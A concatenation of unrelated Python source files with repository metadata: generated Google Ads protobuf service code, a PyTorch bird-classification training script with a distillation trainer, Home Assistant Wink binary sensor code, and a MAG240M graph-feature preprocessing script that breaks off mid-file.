DESCRIPTOR.message_types_by_name['MutateCustomInterestsRequest'] = _MUTATECUSTOMINTERESTSREQUEST
DESCRIPTOR.message_types_by_name['CustomInterestOperation'] = _CUSTOMINTERESTOPERATION
DESCRIPTOR.message_types_by_name['MutateCustomInterestsResponse'] = _MUTATECUSTOMINTERESTSRESPONSE
DESCRIPTOR.message_types_by_name['MutateCustomInterestResult'] = _MUTATECUSTOMINTERESTRESULT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetCustomInterestRequest = _reflection.GeneratedProtocolMessageType('GetCustomInterestRequest', (_message.Message,), {
'DESCRIPTOR' : _GETCUSTOMINTERESTREQUEST,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """Request message for [CustomInterestService.GetCustomInterest][google.a
ds.googleads.v6.services.CustomInterestService.GetCustomInterest].
Attributes:
resource_name:
Required. The resource name of the custom interest to fetch.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.GetCustomInterestRequest)
})
_sym_db.RegisterMessage(GetCustomInterestRequest)
MutateCustomInterestsRequest = _reflection.GeneratedProtocolMessageType('MutateCustomInterestsRequest', (_message.Message,), {
'DESCRIPTOR' : _MUTATECUSTOMINTERESTSREQUEST,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """Request message for [CustomInterestService.MutateCustomInterests][goog
le.ads.googleads.v6.services.CustomInterestService.MutateCustomInteres
ts].
Attributes:
customer_id:
Required. The ID of the customer whose custom interests are
being modified.
operations:
Required. The list of operations to perform on individual
custom interests.
validate_only:
If true, the request is validated but not executed. Only
errors are returned, not results.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.MutateCustomInterestsRequest)
})
_sym_db.RegisterMessage(MutateCustomInterestsRequest)
CustomInterestOperation = _reflection.GeneratedProtocolMessageType('CustomInterestOperation', (_message.Message,), {
'DESCRIPTOR' : _CUSTOMINTERESTOPERATION,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """A single operation (create, update) on a custom interest.
Attributes:
update_mask:
FieldMask that determines which resource fields are modified
in an update.
operation:
The mutate operation.
create:
Create operation: No resource name is expected for the new
custom interest.
update:
Update operation: The custom interest is expected to have a
valid resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.CustomInterestOperation)
})
_sym_db.RegisterMessage(CustomInterestOperation)
MutateCustomInterestsResponse = _reflection.GeneratedProtocolMessageType('MutateCustomInterestsResponse', (_message.Message,), {
'DESCRIPTOR' : _MUTATECUSTOMINTERESTSRESPONSE,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """Response message for custom interest mutate.
Attributes:
results:
All results for the mutate.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.MutateCustomInterestsResponse)
})
_sym_db.RegisterMessage(MutateCustomInterestsResponse)
MutateCustomInterestResult = _reflection.GeneratedProtocolMessageType('MutateCustomInterestResult', (_message.Message,), {
'DESCRIPTOR' : _MUTATECUSTOMINTERESTRESULT,
'__module__' : 'google.ads.googleads_v6.proto.services.custom_interest_service_pb2'
,
'__doc__': """The result for the custom interest mutate.
Attributes:
resource_name:
Returned for successful operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.services.MutateCustomInterestResult)
})
_sym_db.RegisterMessage(MutateCustomInterestResult)
DESCRIPTOR._options = None
_GETCUSTOMINTERESTREQUEST.fields_by_name['resource_name']._options = None
_MUTATECUSTOMINTERESTSREQUEST.fields_by_name['customer_id']._options = None
_MUTATECUSTOMINTERESTSREQUEST.fields_by_name['operations']._options = None
_CUSTOMINTERESTSERVICE = _descriptor.ServiceDescriptor(
name='CustomInterestService',
full_name='google.ads.googleads.v6.services.CustomInterestService',
file=DESCRIPTOR,
index=0,
serialized_options=b'\312A\030googleads.googleapis.com',
create_key=_descriptor._internal_create_key,
serialized_start=978,
serialized_end=1483,
methods=[
_descriptor.MethodDescriptor(
name='GetCustomInterest',
full_name='google.ads.googleads.v6.services.CustomInterestService.GetCustomInterest',
index=0,
containing_service=None,
input_type=_GETCUSTOMINTERESTREQUEST,
output_type=google_dot_ads_dot_googleads__v6_dot_proto_dot_resources_dot_custom__interest__pb2._CUSTOMINTEREST,
serialized_options=b'\202\323\344\223\0023\0221/v6/{resource_name=customers/*/customInterests/*}\332A\rresource_name',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='MutateCustomInterests',
full_name='google.ads.googleads.v6.services.CustomInterestService.MutateCustomInterests',
index=1,
containing_service=None,
input_type=_MUTATECUSTOMINTERESTSREQUEST,
output_type=_MUTATECUSTOMINTERESTSRESPONSE,
serialized_options=b'\202\323\344\223\0029\"4/v6/customers/{customer_id=*}/customInterests:mutate:\001*\332A\026customer_id,operations',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_CUSTOMINTERESTSERVICE)
DESCRIPTOR.services_by_name['CustomInterestService'] = _CUSTOMINTERESTSERVICE
# @@protoc_insertion_point(module_scope)
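# --- Usage sketch (illustrative; not part of the generated file, which should not
# be edited in place). The customer id and resource name below are hypothetical
# placeholders; the message and field names come from the descriptors registered above.
#
#   request = GetCustomInterestRequest(
#       resource_name="customers/1234567890/customInterests/111")
#   mutate = MutateCustomInterestsRequest(customer_id="1234567890", validate_only=True)
#   operation = mutate.operations.add()          # an empty CustomInterestOperation
#   operation.update_mask.paths.append("name")   # hypothetical field of the CustomInterest to update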
| 48.75
| 2,293
| 0.794872
|
56574cfa3400ea078d6b64fdc5af1b3cf3ca4628
| 6,860
|
py
|
Python
|
classifier/train.py
|
theovincent/birdClassification
|
21e23a4f4c67714006e7ccc606134ca8d0fe5d9d
|
[
"MIT"
] | null | null | null |
classifier/train.py
|
theovincent/birdClassification
|
21e23a4f4c67714006e7ccc606134ca8d0fe5d9d
|
[
"MIT"
] | null | null | null |
classifier/train.py
|
theovincent/birdClassification
|
21e23a4f4c67714006e7ccc606134ca8d0fe5d9d
|
[
"MIT"
] | null | null | null |
import sys
import os
import torch
import pandas as pd
def train_cli(argvs=sys.argv[1:]):
import argparse
import torch.optim as optim
from classifier.loader import loader
from classifier.model import get_model
from classifier.loss import cross_entropy_loss
from classifier.validation import validation
parser = argparse.ArgumentParser("Pipeline to train a model to classify the birds")
parser.add_argument(
"-c",
"--colab",
default=False,
action="store_true",
help="if given, path_data will be modified with the correct path to the data in my google drive, otherwise nothing happens, (default: False)",
)
parser.add_argument(
"-m",
"--model",
type=str,
required=True,
metavar="M",
help="the model name (required)",
choices=["resnet", "alexnet", "vgg", "squeezenet", "densenet", "efficientnet"],
)
parser.add_argument(
"-psw",
"--path_starting_weights",
type=str,
default="ImageNet",
metavar="PSW",
help="the path to the starting weights, if None, takes random weights, 'output' will be added to the front (default: ImageNet)",
)
parser.add_argument(
"-pd",
"--path_data",
type=str,
required=True,
metavar="PD",
help="the path that leads to the data, 'bird_dataset' will be added to the front (required)",
)
parser.add_argument(
"-nc",
"--number_classes",
type=int,
default=20,
metavar="NC",
help="the number of classes to classify (default: 20)",
)
parser.add_argument(
"-4D",
"--classifier_4D",
default=False,
action="store_true",
help="if given, a segmentation map will be added to the input, (default: False)",
)
parser.add_argument(
"-fe",
"--feature_extraction",
default=False,
action="store_true",
help="if given, feature extraction will be performed, otherwise full training will be done, (default: False)",
)
parser.add_argument(
"-bs", "--batch_size", type=int, default=64, metavar="BS", help="input batch size for training (default: 64)"
)
parser.add_argument(
"-ne", "--n_epochs", type=int, default=1, metavar="NE", help="number of epochs to train (default: 10)"
)
parser.add_argument(
"-lr",
"--learning_rate",
type=float,
default=0.0005,
metavar="LR",
help="first learning rate before decreasing (default: 0.0005)",
)
parser.add_argument("-s", "--seed", type=int, default=1, metavar="S", help="random seed (default: 1)")
parser.add_argument(
"-po",
"--path_output",
type=str,
required=True,
metavar="PO",
help="folder where experiment outputs are located, 'output' will be added to the front (required)",
)
args = parser.parse_args(argvs)
print(args)
path_output = f"output/{args.path_output}"
# Create experiment folder
if not os.path.isdir(path_output):
os.makedirs(path_output)
# Torch meta settings
use_cuda = torch.cuda.is_available()
if use_cuda:
map_location = torch.device("cuda")
else:
map_location = torch.device("cpu")
torch.manual_seed(args.seed)
# Define the model, the loss and the optimizer
if args.path_starting_weights is not None and args.path_starting_weights != "ImageNet":
if args.colab:
args.path_starting_weights = (
f"/content/Drive/MyDrive/MVA/ObjectRecognition/birdClassification/output/{args.path_starting_weights}"
)
else:
args.path_starting_weights = f"output/{args.path_starting_weights}"
model, input_size = get_model(
args.model,
feature_extract=args.feature_extraction,
path_starting_weights=args.path_starting_weights,
num_classes=args.number_classes,
classifier_4D=args.classifier_4D,
map_location=map_location,
)
if use_cuda:
print("\n\n!! Using GPU !!\n\n")
model.cuda()
else:
print("\n\n!! Using CPU !!\n\n")
loss = cross_entropy_loss()
losses = pd.DataFrame(
None, index=range(1, args.n_epochs + 1), columns=["train_loss", "validation_loss", "validation_accuracy"]
)
# Define the data loaders
if args.colab:
args.path_data = (
"/content/Drive/MyDrive/MVA/ObjectRecognition/birdClassification/bird_dataset/" + args.path_data
)
else:
args.path_data = "bird_dataset/" + args.path_data
train_loader = loader(
args.path_data,
input_size,
"train",
args.batch_size,
shuffle=True,
data_augmentation=True,
classifier_4D=args.classifier_4D,
)
validation_loader = loader(
args.path_data,
input_size,
"val",
args.batch_size,
shuffle=False,
data_augmentation=False,
classifier_4D=args.classifier_4D,
)
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate, weight_decay=0.05)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, "min", factor=0.5, patience=6, verbose=True)
for epoch in range(1, args.n_epochs + 1):
print(f"Train Epoch {epoch}:")
train_loss = train_on_epoch(model, loss, optimizer, train_loader, use_cuda) / args.batch_size
validation_loss, validation_accuracy = validation(model, loss, validation_loader, use_cuda)
scheduler.step(validation_loss)
losses.loc[epoch, ["train_loss", "validation_loss", "validation_accuracy"]] = [
train_loss,
validation_loss,
validation_accuracy,
]
if epoch % 2 == 1:
path_weights = f"{path_output}/{args.model}_{str(epoch)}.pth"
torch.save(model.state_dict(), path_weights)
        # Save at each epoch to be sure that the metrics are saved if an error occurs
losses.reset_index().to_feather(f"{path_output}/{args.model}.feather")
def train_on_epoch(model, loss, optimizer, loader, use_cuda):
loss_on_batch = None
model.train()
for batch_idx, (data, target) in enumerate(loader):
if use_cuda:
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
output = model(data)
loss_error = loss(output, target)
loss_error.backward()
optimizer.step()
if batch_idx % (len(loader) // 5) == 0:
loss_on_batch = loss_error.data.item()
print(
f"[{batch_idx * len(data)}/{len(loader.dataset)} ({int(100.0 * batch_idx / len(loader))}%)]\tLoss: {loss_on_batch:.6f}"
)
return loss_on_batch
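# --- Usage sketch (illustrative, not part of the original module) ---
# train_cli() parses the flags defined above, so it can be driven directly from
# Python as well as from a console entry point. The dataset sub-folder and output
# folder names below are hypothetical; the code prepends "bird_dataset/" and
# "output/" to them.
def _train_cli_example():  # pragma: no cover - illustrative only
    train_cli([
        "--model", "resnet",
        "--path_data", "cropped",        # becomes bird_dataset/cropped
        "--path_output", "resnet_run1",  # becomes output/resnet_run1
        "--batch_size", "32",
        "--n_epochs", "10",
        "--learning_rate", "0.0005",
    ])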
| 32.206573
| 150
| 0.615889
|
e82a767fde831567fc037288d23e024e35688e43
| 6,534
|
py
|
Python
|
homeassistant/components/wink/binary_sensor.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 3
|
2020-01-21T18:09:09.000Z
|
2022-01-17T08:06:03.000Z
|
homeassistant/components/wink/binary_sensor.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 39
|
2016-12-16T12:40:34.000Z
|
2017-02-13T17:53:42.000Z
|
homeassistant/components/wink/binary_sensor.py
|
petewill/home-assistant
|
5859dba4344f05fb8774aa1207e47ac28f627a67
|
[
"Apache-2.0"
] | 3
|
2020-01-11T15:44:13.000Z
|
2022-01-17T08:06:09.000Z
|
"""Support for Wink binary sensors."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from . import DOMAIN, WinkDevice
_LOGGER = logging.getLogger(__name__)
# These are the available sensors mapped to binary_sensor class
SENSOR_TYPES = {
"brightness": "light",
"capturing_audio": "sound",
"capturing_video": None,
"co_detected": "gas",
"liquid_detected": "moisture",
"loudness": "sound",
"motion": "motion",
"noise": "sound",
"opened": "opening",
"presence": "occupancy",
"smoke_detected": "smoke",
"vibration": "vibration",
}
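# Worked example of the mapping above: SENSOR_TYPES.get("opened") -> "opening",
# while capabilities mapped to None (e.g. "capturing_video") expose no device class.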
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Wink binary sensor platform."""
import pywink
for sensor in pywink.get_sensors():
_id = sensor.object_id() + sensor.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
if sensor.capability() in SENSOR_TYPES:
add_entities([WinkBinarySensorDevice(sensor, hass)])
for key in pywink.get_keys():
_id = key.object_id() + key.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkBinarySensorDevice(key, hass)])
for sensor in pywink.get_smoke_and_co_detectors():
_id = sensor.object_id() + sensor.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkSmokeDetector(sensor, hass)])
for hub in pywink.get_hubs():
_id = hub.object_id() + hub.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkHub(hub, hass)])
for remote in pywink.get_remotes():
_id = remote.object_id() + remote.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkRemote(remote, hass)])
for button in pywink.get_buttons():
_id = button.object_id() + button.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkButton(button, hass)])
for gang in pywink.get_gangs():
_id = gang.object_id() + gang.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkGang(gang, hass)])
for door_bell_sensor in pywink.get_door_bells():
_id = door_bell_sensor.object_id() + door_bell_sensor.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkBinarySensorDevice(door_bell_sensor, hass)])
for camera_sensor in pywink.get_cameras():
_id = camera_sensor.object_id() + camera_sensor.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
try:
if camera_sensor.capability() in SENSOR_TYPES:
add_entities([WinkBinarySensorDevice(camera_sensor, hass)])
except AttributeError:
_LOGGER.info("Device isn't a sensor, skipping")
class WinkBinarySensorDevice(WinkDevice, BinarySensorDevice):
"""Representation of a Wink binary sensor."""
def __init__(self, wink, hass):
"""Initialize the Wink binary sensor."""
super().__init__(wink, hass)
if hasattr(self.wink, "unit"):
self._unit_of_measurement = self.wink.unit()
else:
self._unit_of_measurement = None
if hasattr(self.wink, "capability"):
self.capability = self.wink.capability()
else:
self.capability = None
async def async_added_to_hass(self):
"""Call when entity is added to hass."""
self.hass.data[DOMAIN]["entities"]["binary_sensor"].append(self)
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self.wink.state()
@property
def device_class(self):
"""Return the class of this sensor, from DEVICE_CLASSES."""
return SENSOR_TYPES.get(self.capability)
@property
def device_state_attributes(self):
"""Return the device state attributes."""
return super().device_state_attributes
class WinkSmokeDetector(WinkBinarySensorDevice):
"""Representation of a Wink Smoke detector."""
@property
def device_state_attributes(self):
"""Return the device state attributes."""
_attributes = super().device_state_attributes
_attributes["test_activated"] = self.wink.test_activated()
return _attributes
class WinkHub(WinkBinarySensorDevice):
"""Representation of a Wink Hub."""
@property
def device_state_attributes(self):
"""Return the device state attributes."""
_attributes = super().device_state_attributes
_attributes["update_needed"] = self.wink.update_needed()
_attributes["firmware_version"] = self.wink.firmware_version()
_attributes["pairing_mode"] = self.wink.pairing_mode()
_kidde_code = self.wink.kidde_radio_code()
if _kidde_code is not None:
# The service call to set the Kidde code
# takes a string of 1s and 0s so it makes
# sense to display it to the user that way
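            # (Illustrative example: a radio code of 5 would be shown as "00000101".)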
_formatted_kidde_code = f"{_kidde_code:b}".zfill(8)
_attributes["kidde_radio_code"] = _formatted_kidde_code
return _attributes
class WinkRemote(WinkBinarySensorDevice):
"""Representation of a Wink Lutron Connected bulb remote."""
@property
def device_state_attributes(self):
"""Return the state attributes."""
_attributes = super().device_state_attributes
_attributes["button_on_pressed"] = self.wink.button_on_pressed()
_attributes["button_off_pressed"] = self.wink.button_off_pressed()
_attributes["button_up_pressed"] = self.wink.button_up_pressed()
_attributes["button_down_pressed"] = self.wink.button_down_pressed()
return _attributes
@property
def device_class(self):
"""Return the class of this sensor, from DEVICE_CLASSES."""
return None
class WinkButton(WinkBinarySensorDevice):
"""Representation of a Wink Relay button."""
@property
def device_state_attributes(self):
"""Return the device state attributes."""
_attributes = super().device_state_attributes
_attributes["pressed"] = self.wink.pressed()
_attributes["long_pressed"] = self.wink.long_pressed()
return _attributes
class WinkGang(WinkBinarySensorDevice):
"""Representation of a Wink Relay gang."""
@property
def is_on(self):
"""Return true if the gang is connected."""
return self.wink.state()
| 35.129032
| 79
| 0.653658
|
59c148115aeb2f4ad2629408d740af2936d0ac3b
| 777
|
py
|
Python
|
setup.py
|
AlexSartori/mcvf
|
23f879b22db2bd46b9d527ca4d926ccd3bc65d8d
|
[
"MIT"
] | null | null | null |
setup.py
|
AlexSartori/mcvf
|
23f879b22db2bd46b9d527ca4d926ccd3bc65d8d
|
[
"MIT"
] | null | null | null |
setup.py
|
AlexSartori/mcvf
|
23f879b22db2bd46b9d527ca4d926ccd3bc65d8d
|
[
"MIT"
] | null | null | null |
import setuptools # type: ignore
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="mcvf",
version="0.0.1",
author="Alessandro Sartori",
author_email="alex.sartori1997@gmail.com",
description="Motion-Compensated Video Filtering",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/alexsartori/mcvf",
packages=setuptools.find_packages(),
package_data={},
entry_points={
},
classifiers=[
"Programming Language :: Python :: 3 :: Only",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
],
keywords='motion-compensated video filtering',
python_requires='>=3.6',
)
| 27.75
| 54
| 0.662806
|
9eb3397dcc5364048474e1320d58fff98f90a528
| 194
|
py
|
Python
|
pincer/middleware/activity_join_request.py
|
ashu96902/Pincer
|
102ac4ff998cbb3c57a86b252439f69895650cf3
|
[
"MIT"
] | null | null | null |
pincer/middleware/activity_join_request.py
|
ashu96902/Pincer
|
102ac4ff998cbb3c57a86b252439f69895650cf3
|
[
"MIT"
] | null | null | null |
pincer/middleware/activity_join_request.py
|
ashu96902/Pincer
|
102ac4ff998cbb3c57a86b252439f69895650cf3
|
[
"MIT"
] | null | null | null |
# Copyright Pincer 2021-Present
# Full MIT License can be found in `LICENSE` at the project root.
"""sent when the user receives a Rich Presence Ask to Join request"""
# TODO: Implement event
| 27.714286
| 69
| 0.747423
|
32493a8056882d3111a51a49ebdbc044fed751b7
| 2,543
|
py
|
Python
|
examples/exampleSmoothDepthImageOpenCV.py
|
bearpaw/pyKinectAzure
|
e55bc574806641b9e3209d7843ccadd871a630a5
|
[
"MIT"
] | null | null | null |
examples/exampleSmoothDepthImageOpenCV.py
|
bearpaw/pyKinectAzure
|
e55bc574806641b9e3209d7843ccadd871a630a5
|
[
"MIT"
] | null | null | null |
examples/exampleSmoothDepthImageOpenCV.py
|
bearpaw/pyKinectAzure
|
e55bc574806641b9e3209d7843ccadd871a630a5
|
[
"MIT"
] | null | null | null |
import sys
sys.path.insert(1, '../pyKinectAzure/')
import numpy as np
from pyKinectAzure import pyKinectAzure, _k4a, postProcessing
import cv2
# Path to the module
# TODO: Modify with the path containing the k4a.dll from the Azure Kinect SDK
modulePath = 'C:\\Program Files\\Azure Kinect SDK v1.4.1\\sdk\\windows-desktop\\amd64\\release\\bin\\k4a.dll'
if __name__ == "__main__":
# Initialize the library with the path containing the module
pyK4A = pyKinectAzure(modulePath)
# Open device
pyK4A.device_open()
# Modify camera configuration
device_config = pyK4A.config
device_config.color_resolution = _k4a.K4A_COLOR_RESOLUTION_1080P
device_config.depth_mode = _k4a.K4A_DEPTH_MODE_WFOV_2X2BINNED
print(device_config)
# Start cameras using modified configuration
pyK4A.device_start_cameras(device_config)
k = 0
while True:
# Get capture
pyK4A.device_get_capture()
# Get the depth image from the capture
depth_image_handle = pyK4A.capture_get_depth_image()
# Check the image has been read correctly
if depth_image_handle:
# Read and convert the image data to numpy array:
depth_image = pyK4A.image_convert_to_numpy(depth_image_handle)
            # Smooth the image using Navier-Stokes based inpainting. maximum_hole_size defines
            # the maximum hole size to be filled; a bigger hole size takes longer to process.
maximum_hole_size = 10
smoothed_depth_image = postProcessing.smooth_depth_image(depth_image,maximum_hole_size)
# Convert depth image (mm) to color, the range needs to be reduced down to the range (0,255)
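            # (Note: dividing by 30 maps depths of roughly 0-7650 mm onto the 0-255 colormap range.)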
depth_color_image = cv2.applyColorMap(np.round(depth_image/30).astype(np.uint8), cv2.COLORMAP_JET)
smooth_depth_color_image = cv2.applyColorMap(np.round(smoothed_depth_image/30).astype(np.uint8), cv2.COLORMAP_JET)
# Concatenate images for comparison
comparison_image = np.concatenate((depth_color_image, smooth_depth_color_image), axis=1)
comparison_image = cv2.putText(comparison_image, 'Original', (180, 50) , cv2.FONT_HERSHEY_SIMPLEX ,1.5, (255,255,255), 3, cv2.LINE_AA)
comparison_image = cv2.putText(comparison_image, 'Smoothed', (670, 50) , cv2.FONT_HERSHEY_SIMPLEX ,1.5, (255,255,255), 3, cv2.LINE_AA)
# Plot the image
cv2.namedWindow('Smoothed Depth Image',cv2.WINDOW_NORMAL)
cv2.imshow('Smoothed Depth Image',comparison_image)
k = cv2.waitKey(25)
# Release the image
pyK4A.image_release(depth_image_handle)
pyK4A.capture_release()
if k==27: # Esc key to stop
break
pyK4A.device_stop_cameras()
pyK4A.device_close()
| 35.816901
| 138
| 0.768777
|
338f4d7afbe4e6ad4b4c4d91eebd561a5b6d4b7d
| 904
|
py
|
Python
|
ml/ex02/grid_search.py
|
AlexanderChristian/private_courses
|
c80f3526af539e35f93b460f3909f669aaef573c
|
[
"MIT"
] | null | null | null |
ml/ex02/grid_search.py
|
AlexanderChristian/private_courses
|
c80f3526af539e35f93b460f3909f669aaef573c
|
[
"MIT"
] | 6
|
2020-03-04T20:52:39.000Z
|
2022-03-31T00:33:07.000Z
|
ml/ex02/solution/grid_search.py
|
AlexanderChristian/private_courses
|
c80f3526af539e35f93b460f3909f669aaef573c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Exercise 2.
Grid Search
"""
import numpy as np
from costs import compute_loss
def generate_w(num_intervals):
"""Generate a grid of values for w0 and w1."""
w0 = np.linspace(-100, 200, num_intervals)
w1 = np.linspace(-150, 150, num_intervals)
return w0, w1
def grid_search(y, tx, w0, w1):
"""Algorithm for grid search."""
losses = np.zeros((len(w0), len(w1)))
# compute loss for each combination of w0 and w1.
for ind_row, row in enumerate(w0):
for ind_col, col in enumerate(w1):
w = np.array([row, col])
losses[ind_row, ind_col] = compute_loss(y, tx, w)
return losses
def get_best_parameters(w0, w1, losses):
"""Get the best w from the result of grid search."""
min_row, min_col = np.unravel_index(np.argmin(losses), losses.shape)
return losses[min_row, min_col], w0[min_row], w1[min_col]
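# Minimal usage sketch (illustrative; `y` and `tx` are assumed to be the label
# vector and feature matrix expected by compute_loss):
#
#     w0, w1 = generate_w(num_intervals=50)
#     losses = grid_search(y, tx, w0, w1)
#     best_loss, best_w0, best_w1 = get_best_parameters(w0, w1, losses)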
| 27.393939
| 72
| 0.646018
|
365ff6a84a678ba4e79c8b8ccec547516c10b7fa
| 2,825
|
py
|
Python
|
research/information_retrieval/doc2query/src/distill_doc2query.py
|
clementpoiret/sparseml
|
8442a6ef8ba11fb02f5e51472dd68b72438539b9
|
[
"Apache-2.0"
] | 922
|
2021-02-04T17:51:54.000Z
|
2022-03-31T20:49:26.000Z
|
research/information_retrieval/doc2query/src/distill_doc2query.py
|
clementpoiret/sparseml
|
8442a6ef8ba11fb02f5e51472dd68b72438539b9
|
[
"Apache-2.0"
] | 197
|
2021-02-04T22:17:21.000Z
|
2022-03-31T13:58:55.000Z
|
research/information_retrieval/doc2query/src/distill_doc2query.py
|
clementpoiret/sparseml
|
8442a6ef8ba11fb02f5e51472dd68b72438539b9
|
[
"Apache-2.0"
] | 80
|
2021-02-04T22:20:14.000Z
|
2022-03-30T19:36:15.000Z
|
# neuralmagic: no copyright
# flake8: noqa
# fmt: off
# isort: skip_file
#!/usr/bin/env python
# coding=utf-8
# Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
import torch
from torch import nn
import torch.nn.functional as F
from torch import Tensor
from transformers import Trainer, is_datasets_available, is_torch_tpu_available
from transformers.trainer_utils import PredictionOutput
class DistillGlueTrainer(Trainer):
def __init__(self, *args, eval_examples=None, post_process_function=None, teacher=None, loss=None, batch_size=8, max_sequence_length=384,distill_hardness=1.0, temperature=2.0, **kwargs):
super().__init__(*args, **kwargs)
self.eval_examples = eval_examples
self.post_process_function = post_process_function
self.loss = loss
self.teacher = teacher
self.batch_size = batch_size
self.temperature = temperature
self.distill_hardness = distill_hardness
self.criterion = nn.CrossEntropyLoss()
self.max_sequence_length = max_sequence_length
if self.teacher is None:
self.distill_hardness = 0
def compute_loss(self, model, inputs, return_outputs=False):
"""
        How the loss is computed by Trainer. Modified for distillation using a student-teacher framework.
"""
outputs = model(**inputs)
loss = outputs["loss"]
logits_student = outputs["logits"]
if self.teacher is not None:
input_device = inputs["input_ids"].device
self.teacher = self.teacher.to(input_device)
with torch.no_grad():
teacher_outputs = self.teacher(
input_ids=inputs["input_ids"],
token_type_ids=inputs["token_type_ids"],
attention_mask=inputs["attention_mask"],
)
logits_teacher = teacher_outputs["logits"]
loss_distill = F.kl_div( input=logits_student, target=logits_teacher, reduction="batchmean",) * (self.temperature ** 2)
loss = ((1-self.distill_hardness) * loss) + torch.abs((self.distill_hardness * loss_distill))
return (loss, outputs) if return_outputs else loss
| 43.461538
| 190
| 0.688142
|
069904d04b11d883234d90febb09382c7c4ec8ec
| 4,067
|
py
|
Python
|
examples/kddcup2021/MAG240M/r_unimp/dataset/sage_institution_x.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 1,389
|
2019-06-11T03:29:20.000Z
|
2022-03-29T18:25:43.000Z
|
examples/kddcup2021/MAG240M/r_unimp/dataset/sage_institution_x.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 232
|
2019-06-21T06:52:10.000Z
|
2022-03-29T08:20:31.000Z
|
examples/kddcup2021/MAG240M/r_unimp/dataset/sage_institution_x.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 229
|
2019-06-20T12:13:58.000Z
|
2022-03-25T12:04:48.000Z
|
import os
import yaml
import pgl
import time
import copy
import numpy as np
import os.path as osp
from pgl.utils.logger import log
from pgl.bigraph import BiGraph
from pgl import graph_kernel
from pgl.sampling.custom import subgraph
from ogb.lsc import MAG240MDataset, MAG240MEvaluator
import time
import paddle
from tqdm import tqdm
from pgl.utils.helper import scatter
def get_col_slice(x, start_row_idx, end_row_idx, start_col_idx, end_col_idx):
outs = []
chunk = 100000
for i in tqdm(range(start_row_idx, end_row_idx, chunk)):
j = min(i + chunk, end_row_idx)
outs.append(x[i:j, start_col_idx:end_col_idx].copy())
return np.concatenate(outs, axis=0)
def save_col_slice(x_src, x_dst, start_row_idx, end_row_idx, start_col_idx,
end_col_idx):
assert x_src.shape[0] == end_row_idx - start_row_idx
assert x_src.shape[1] == end_col_idx - start_col_idx
chunk, offset = 100000, start_row_idx
for i in tqdm(range(0, end_row_idx - start_row_idx, chunk)):
j = min(i + chunk, end_row_idx - start_row_idx)
x_dst[offset + i:offset + j, start_col_idx:end_col_idx] = x_src[i:j]
class MAG240M(object):
"""Iterator"""
def __init__(self, data_dir, seed=123):
self.data_dir = data_dir
self.num_features = 768
self.num_classes = 153
self.seed = seed
def prepare_data(self):
dataset = MAG240MDataset(self.data_dir)
log.info(dataset.num_authors)
log.info(dataset.num_institutions)
author_path = f'{dataset.dir}/author_feat.npy'
path = f'{dataset.dir}/institution_feat.npy'
t = time.perf_counter()
if not osp.exists(path):
log.info('get institution_feat...')
author_feat = np.memmap(author_path, dtype=np.float16,
shape=(dataset.num_authors, self.num_features),
mode='r')
# author
edge_index = dataset.edge_index('author', 'institution')
edge_index = edge_index.T
log.info(edge_index.shape)
institution_graph = BiGraph(edge_index, dst_num_nodes=dataset.num_institutions)
institution_graph.tensor()
log.info('finish institution graph')
institution_x = np.memmap(path, dtype=np.float16, mode='w+',
shape=(dataset.num_institutions, self.num_features))
dim_chunk_size = 64
degree = paddle.zeros(shape=[dataset.num_institutions, 1], dtype='float32')
temp_one = paddle.ones(shape=[edge_index.shape[0], 1], dtype='float32')
degree = scatter(degree, overwrite=False, index=institution_graph.edges[:, 1],
updates=temp_one)
log.info('finish degree')
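            # The loop below builds institution features 64 columns at a time:
            # send_recv aggregates the author feature rows onto each institution
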